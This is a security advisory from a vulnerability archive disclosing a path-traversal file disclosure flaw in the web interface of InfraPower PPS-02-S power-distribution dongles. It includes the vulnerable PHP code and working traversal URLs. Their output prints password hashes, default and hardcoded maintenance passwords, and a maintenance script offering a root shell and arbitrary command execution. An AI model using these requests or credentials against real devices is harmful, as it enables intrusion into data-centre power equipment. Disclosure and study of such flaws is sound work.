InfraPower PPS-02-S Q213V1 Local File Disclosure

2016-10-30T00:00:00
ID PACKETSTORM:139419
Type packetstorm
Reporter LiquidWorm
Modified 2016-10-30T00:00:00

Description

                                        
                                            `  
InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability  
  
  
Vendor: Austin Hughes Electronics Ltd.  
Product web page: http://www.austin-hughes.com  
Affected version: Q213V1 (Firmware: V2395S)  
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)  
  
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each  
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.  
Patented IP Dongle provides IP remote access to the PDUs by a true  
network IP address chain. Only 1xIP dongle allows access to max. 16  
PDUs in daisy chain - which is a highly efficient cient application  
for saving not only the IP remote accessories cost, but also the true  
IP addresses required on the PDU management.  
  
Desc: InfraPower suffers from a file disclosure vulnerability when  
input passed thru the 'file' parameter to 'ListFile.php' script is  
not properly verified before being used to read files. This can  
be exploited to disclose contents of files from local resources.  
  
-------------------------------------------------------------------  
ListFile.php:  
-------------  
  
8: if(isset($_GET['file'])){  
9: $handle = $_GET['file'];  
10: $fp = fopen('/ramdisk/'.$handle, 'r');  
11: while(!feof($fp)){  
12: $tmp=fgets($fp,2000);  
13: $tmp = str_replace("\n","<br />",$tmp);  
14: echo $tmp;  
15: }  
16: fclose($fp);  
17: }  
  
-------------------------------------------------------------------  
  
  
Tested on: Linux 2.6.28 (armv5tel)  
lighttpd/1.4.30-devel-1321  
PHP/5.3.9  
SQLite/3.7.10  
  
  
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5370  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php  
  
  
27.09.2016  
  
--  
  
  
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd  
  
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh  
bin:x:1:1:bin:/bin:/bin/sh  
daemon:x:2:2:daemon:/usr/sbin:/bin/sh  
adm:x:3:4:adm:/adm:/bin/sh  
lp:x:4:7:lp:/var/spool/lpd:/bin/sh  
sync:x:5:0:sync:/bin:/bin/sync  
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh  
operator:x:11:0:Operator:/var:/bin/sh  
nobody:x:99:99:nobody:/home:/bin/sh  
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script  
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script  
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh  
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh  
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh  
  
  
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf  
  
LoginAuth 1  
UserName 00000000  
Password 00000000  
  
  
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf  
  
dmin 999999  
manager 666666  
user 111111  
  
  
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh  
  
#!/bin/sh  
echo -n "Please enter maintenance password:"  
read -s pass  
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`  
if [ "$InfraType" == "1" ]; then  
if [ "$pass" != "InfraSolution" ]; then  
echo "Invalid maintenance password!"  
exit 0  
fi  
else  
if [ "$InfraType" == "2" ]; then  
if [ "$pass" != "InfraGuard" ]; then  
echo "Invalid maintenance password!"  
exit 0  
fi  
else  
if [ "$InfraType" == "3" ]; then  
if [ "$pass" != "InfraPower" ]; then  
echo "Invalid maintenance password!"  
exit 0  
fi  
else  
if [ "$InfraType" == "4" ]; then  
if [ "$pass" != "InfraCool" ]; then  
echo "Invalid maintenance password!"  
exit 0  
fi  
else  
#---emergency recovery mode  
echo "DEBUG su mode started!"  
su  
fi  
fi  
fi  
fi  
  
# create menu  
echo ""  
echo "***********************************************"  
echo "* Maintenance Menu *"  
echo "***********************************************"  
echo "(1) View(vi) /mnt/mtd/main_conf "  
echo "(2) View /mnt/mtd/snmp_conf "  
echo "(3) View /mnt/mtd/net_conf "  
echo "(4) View /mnt/mtd/web_conf "  
echo "(5) Enable auto patching(boot.sh) on bootup "  
echo "(6) Disable auto patching(boot.sh) on bootup "  
echo "(7) Clear all patching (/mnt/mtd/patch/) "  
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "  
echo "(9) Process Monitoring "  
echo "(A) Patch SNMP "  
echo "(B) Restore Configuration "  
echo "(P) Restore INI, POL profiles "  
echo "(E) Execute command line "  
echo "(M) View meminfo "  
echo "(X) Terminal console mode "  
echo "(R) Reboot "  
echo "(?) This menu "  
echo "(Q) Exit "  
echo "***********************************************"  
while true; do  
echo -n "Input Maintenance menu item number(? for help):"  
read y  
case $y in  
"?")  
echo ""  
echo "***********************************************"  
echo "* Maintenance Menu *"  
echo "***********************************************"  
echo "(1) View(vi) /mnt/mtd/main_conf "  
echo "(2) View /mnt/mtd/snmp_conf "  
echo "(3) View /mnt/mtd/net_conf "  
echo "(4) View /mnt/mtd/web_conf "  
echo "(5) Enable auto patching(boot.sh) on bootup "  
echo "(6) Disable auto patching(boot.sh) on bootup "  
echo "(7) Clear all patching (/mnt/mtd/patch/) "  
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "  
echo "(9) Process Monitoring "  
echo "(A) Patch SNMP "  
echo "(B) Restore Configuration "  
echo "(P) Restore INI, POL profiles "  
echo "(E) Execute command line "  
echo "(M) View meminfo "  
echo "(X) Terminal console mode "  
echo "(R) Reboot "  
echo "(?) This menu "  
echo "(Q) Exit "  
echo "***********************************************"  
;;  
"1")  
echo "****/mnt/mtd/main_conf******************************"  
vi /mnt/mtd/main_conf  
echo "****************************************************"  
;;  
"2")  
echo "****/mnt/mtd/snmp_conf******************************"  
cat /mnt/mtd/snmp_conf  
echo "****************************************************"  
;;  
"3")  
echo "****/mnt/mtd/net_conf*******************************"  
cat /mnt/mtd/net_conf  
echo "****************************************************"  
;;  
"4")  
echo "****/mnt/mtd/web_conf*******************************"  
cat /mnt/mtd/web_conf  
echo "****************************************************"  
;;  
"5")  
echo "(5) Enable auto patching(boot.sh) on bootup "  
echo -n "Are you sure to continue? [y/n]:"  
read ans5  
if [ "$ans5" == "y" ]; then  
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then  
echo -n "Patching boot.sh ..."  
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh  
chmod 777 /mnt/mtd/boot.sh  
if [ -f "/mnt/mtd/boot.sh" ]; then  
echo "...done"  
else  
echo "...fail"  
fi  
else  
echo "file not exist: /mnt/mtd/patch/boot.sh"  
fi  
fi  
;;  
"6")  
echo "(6) Disable auto patching(boot.sh) on bootup "  
echo -n "Are you sure to continue? [y/n]:"  
read ans6  
if [ "$ans6" == "y" ]; then  
if [ -f "/mnt/mtd/boot.sh" ]; then  
echo -n "Disabling boot.sh pacthing..."  
rm /mnt/mtd/boot.sh  
echo "...done"  
else  
echo "File not exist: /mnt/mtd/boot.sh"  
fi  
fi  
;;  
"7")  
echo "(7) Clear /mnt/mtd/patch/ "  
echo -n "Are you sure to continue? [y/n]:"  
read ans7  
if [ "$ans7" == "y" ]; then  
echo -n " Removing patch files (/mnt/mtd/patch/*)..."  
rm -r /mnt/mtd/patch/*  
if [ ! -f "/mnt/mtd/patch/" ]; then  
echo "...done"  
echo -n "Reboot to apply changes? [y/n]:"  
read ans7r  
if [ "$ans7r" == "y" ]; then  
echo "Rebooting..."  
reboot  
fi  
  
else  
echo "...fail"  
fi  
fi  
;;  
"8")  
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "  
echo -n "Are you sure to continue? [y/n]:"  
read ans8  
if [ "$ans8" == "y" ]; then  
if [ -f "/www/patch/patch_now.sh" ]; then  
chmod 777 /www/patch/patch_now.sh  
sh /www/patch/patch_now.sh  
else  
echo "file not exist: /www/patch/patch_now.sh"  
fi  
fi  
;;  
"9")  
echo "****Process List*******************************"  
ps  
echo "***********************************************"  
;;  
"A")  
echo "(A) Patch SNMP "  
echo -n "Are you sure to continue? [y/n]:"  
read ans8  
if [ "$ans8" == "y" ]; then  
if [ -f "/www/patch/snmplink.sh" ]; then  
sh /www/patch/snmplink.sh  
if [ -f "/www/snmplink.log" ]; then  
cat /www/snmplink.log  
fi  
echo "Patching SNMP and its modules...done"  
else  
echo "file not exist: /www/patch/snmplink.sh"  
fi  
fi  
;;  
"B")  
echo "(B) Restore Box Configuration(box_conf) "  
echo -n "Are you sure to continue? [y/n]:"  
read ans8  
if [ "$ans8" == "y" ]; then  
if [ -f "/etc/box_conf" ]; then  
echo "Patching /mnt/mtd/box_conf..."  
cp /etc/box_conf /mnt/mtd/box_conf  
if [ -f "/mnt/mtd/box_conf" ]; then  
echo "Patching /mnt/mtd/box_conf...done"  
else  
echo "Patching /mnt/mtd/box_conf...failed"  
fi  
else  
echo "file not exist: /etc/box_conf"  
fi  
fi  
;;  
"P")  
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`  
echo "(P) Restore INI, POL profiles for $INFRA_VER "  
echo -n "Are you sure to continue? [y/n]:"  
read ansP  
if [ "$ansP" == "y" ]; then  
if [ "$InfraType" == "1" ]; then  
echo "Restoring INI, POL profiles for $INFRA_VER..."  
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then  
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."  
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini  
echo "...done"  
fi  
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then  
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."  
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol  
echo "...done"  
fi  
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then  
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."  
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini  
echo "...done"  
fi  
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then  
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."  
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol  
echo "...done"  
fi  
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then  
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."  
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini  
echo "...done"  
fi  
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then  
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."  
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol  
echo "...done"  
fi  
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then  
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."  
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini  
echo "...done"  
fi  
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then  
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."  
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol  
echo "...done"  
fi  
fi  
fi  
;;  
"E")  
echo -n "Input command line:"  
read cmd_line  
$cmd_line  
;;  
"M")  
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then  
cat /mnt/mtd/log_memCheck.txt  
fi  
;;  
"R")  
echo "(R) Reboot "  
echo -n "Are you sure to continue? [y/n]:"  
read ansR  
if [ "$ansR" == "y" ]; then  
echo "Rebooting..."  
reboot  
fi  
;;  
"X")  
echo "su mode started!"  
su  
;;  
"Q")  
echo "Leaving maintenance mode........OK"  
exit 0  
;;  
esac  
done  
`